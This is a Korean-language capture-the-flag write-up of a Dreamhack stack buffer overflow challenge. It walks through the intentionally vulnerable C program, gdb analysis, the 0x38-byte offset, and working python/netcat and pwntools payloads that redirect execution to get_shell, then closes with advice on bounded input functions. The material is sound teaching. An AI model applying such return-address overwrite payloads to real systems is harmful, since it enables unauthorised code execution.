[Dreamhack] Level1: Return Address Overwrite

🛎️ Access

Exploit Tech: Return Address Overwrite에서 실습하는 문제입니다.

 

👾 Exploit Algorithm & payload

// Name: rao.c
// Compile: gcc -o rao rao.c -fno-stack-protector -no-pie

#include <stdio.h>
#include <unistd.h>

void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}

void get_shell() {
  char *cmd = "/bin/sh";
  char *args[] = {cmd, NULL};

  execve(cmd, args, NULL);
}

int main() {
  char buf[0x28];

  init();

  printf("Input: ");
  scanf("%s", buf);

  return 0;
}

 

#1

---

: rao.c 파일을 컴파일 할 이름(rao)으로 지정해준 후 -no-pie 옵션을 이용하여 PIE(Position Independent Executables)를 비활성화로 켐파일 프로그램을 생성한다.

> PIE란?

실행 파일의 기본 주소를 무작위로 지정하여 공격자가 메모리에서 코드 및 데이터의 위치를 예측하기 어렵게 만드는 최신 시스템 보안 기능. 이는 -no-pie ㅇ옵션을 이용해 버퍼 오버플로 취약점을 악용하려고 할 때 특정 유형의 디버깅 및 악용 기술을 방해할 수 있음.

 

: 컴파일에 관한 정보를 확인하기 위해서 readelf -h사용했다.

 

 

#2

---

char buf[0x28];
//...
scanf("%s", buf);

: 취약점은 scanf의 “%s’로 인한 BOF(Buffer Over Flow)이다.

: “%s”는 문자열을 입력받을 때, 입력의 길이를 따로 제한하지 않고 있고, 띄어쓰기, 탭, 개행 문자 등이 들어올 때까지 입력을 받고 있다.

: 입력을 받은 길이가 0x28(buf)인 배열에 값을 넣고 있는 것이다.

: 여기서 0x28개까지 입력을 받을 공간이 있지만, “%s”만을 사용하여 입력을 받고 있기 때문에 버퍼의 크기보다 큰 데이터 입력이 들어가면 오버플로우가 발생하는 것을 볼 수 있다.

 

 

#3

---

: scanf 함수를 호출할 때, 인자가 2개 사용된다. (%s, 사용자 입력 값)

: 사용자가 입력한 값은 main 함수의 rbp로부터 0x30 떨어진 위치부터 시작하여 값이 저장된다.

: stack은 위에서 밑으로 자라기(아래로 자란다, heap과 반대, 기존 주소보다 낮은 주소로 확장) 때문에 만약 'hello'라는 값을 넣게 된다면 h = '0x30', e = '0x2f', l = '0x2e', l = '0x2d', o = '0x2c' 로 주소가 확장된다고 볼 수 있다.

: 그래서 buf는 rbp-0x30에 있고 스택 프레임 구조에서 rbp 주소에는 SFP가 들어 있고 다음 주소에 RET이 들어 있다고 볼 수 있다.

: 따라서 0x30 + 0x8(0x38, 56개의 문자)로 문자를 채운 RET(프로시저 반환, 반환 값)를 get_shell()함수로 주소 변조 시키면 된다. 

 

 

: 코드로 직접 디버깅하며 확인해 볼 수도 있다.

$ gdb rao
pwndbg> disassemble main
pwndbg> b *main+63    #첫번째 중단점
pwndbg> b *main+69    #두번째 중단점
pwndbg> r
pwndbg> c

: 첫번째 중단점에서 Input: 값으로 hello(정상적인 값)를 입력했을 때, 두번째 중단점에서 정상적인 동작 시 주소를 0x7ffff7de7083로 리턴된다는 것을 볼 수 있다.

: 첫번째 중단점에서 Input: 값으로 많은 입력의 ‘a’(비정상적인 값, 56번 이상 실행)를 입력했을 때, 두번째 중단점에서 주소는 0x7ffff7de7000로 정상 리턴 주소가 아닌 다른 주소 변경된 것을 볼 수 있다.

: 그리고 정상 동작은 mov edi, eax로 call exit 동작을 완료하여 실행 종료를 확인할 수 있는데 여기서는 sbb(Subtact with Borrow)로 이전 빼기 또는 캐리 플래그에서 생성될 수 있는 빌림이 발생하여 실행이 원하는 정상 종료가 되지 않는 것을 확인할 수 있다.

 

 

#4

---

//...
void get_shell() {
  char *cmd = "/bin/sh";
  char *args[] = {cmd, NULL};

  execve(cmd, args, NULL);
}
//...

: 코드에서 프로그램 내에서 쉘을 실행키는 함수가 있는 것을 확인하였기에 main 함수의 리턴 주소를 get_shell()함수로 변경하기 위해 print로 get_shell()함수 주소임을 알 수 있다.

 

issue..

: 0x4011d이기 때문에 payload 작성시 \xdd\x11\x40\x00\x00\x00\x00\x00를 이용했으나 소스 코드를 직접 컴파일 하여 버퍼의 사이즈가 달라졌기 때문에 값을 얻을 수 없었다. 따라서 실습 실제 버퍼 사이즈인 \xaa\x06\x40\x00\x00\x00\x00\x00으로 실행된다.

 

#5

---

(python3 -c "import sys; sys.stdout.buffer.write(b'A'*0x30 + b'B'*0x8 + b'\xaa\x06\x40\x00\x00\x00\x00\x00')"; cat)| nc host3.dreamhack.games 23452

 

from pwn import *

#TCP connection
r = remote('host3.dreamhack.games', 7182) 

#Build payload
get_shell = '\xaa\x06\x40\x00\x00\x00\x00\x00'
payload = 'A' * 0x30 + 'B' * 0x8 + get_shell

#페이로드 전송(\n사용) & 터미널로 데이터 입력하고 프로세스 출력 확인
r.sendline(payload) 
r.interactive()

: 'A'로 0x30 buf, 'B'로 SFP를 (0x38 이상의 문자열,56자)채운 후 get_shell의 주소를 넣어 플래그를 획득할 수 있다.

 

 

🔑Analysis and results for obtaining the Flag DH{…}

---

 

 

📌Summary

---

scanf를 이용하여 "%s"만 사용한다면 악의적으로 버퍼의 크기보다 큰 데이터를 입력하면 오버플로우가 발생할 수 있음

이것을 방지하기 위해서는 정확한 n개의 문자만을 받는 "%[n]s"의 형태로 사용해야 함

 

또한 C/C++의 표준 함수 중 stcpy, stcat, sprintf 등이 있는데, 이 함수들 또한 버퍼를 다루면서 길이를 입력하지 않는 함수이다. 때문에 버퍼의 크기를 같이 입력할 수 있는 것을 사용하는 것이 중요하다. stncpy, memcpy 와 같은 경계 검사를 수행하는 함수를 사용하거나 gets,strcpy,strcat을 사용하기 보다는 안전한 fgets, strncpy, strncat 등을 사용하는것이 좋다.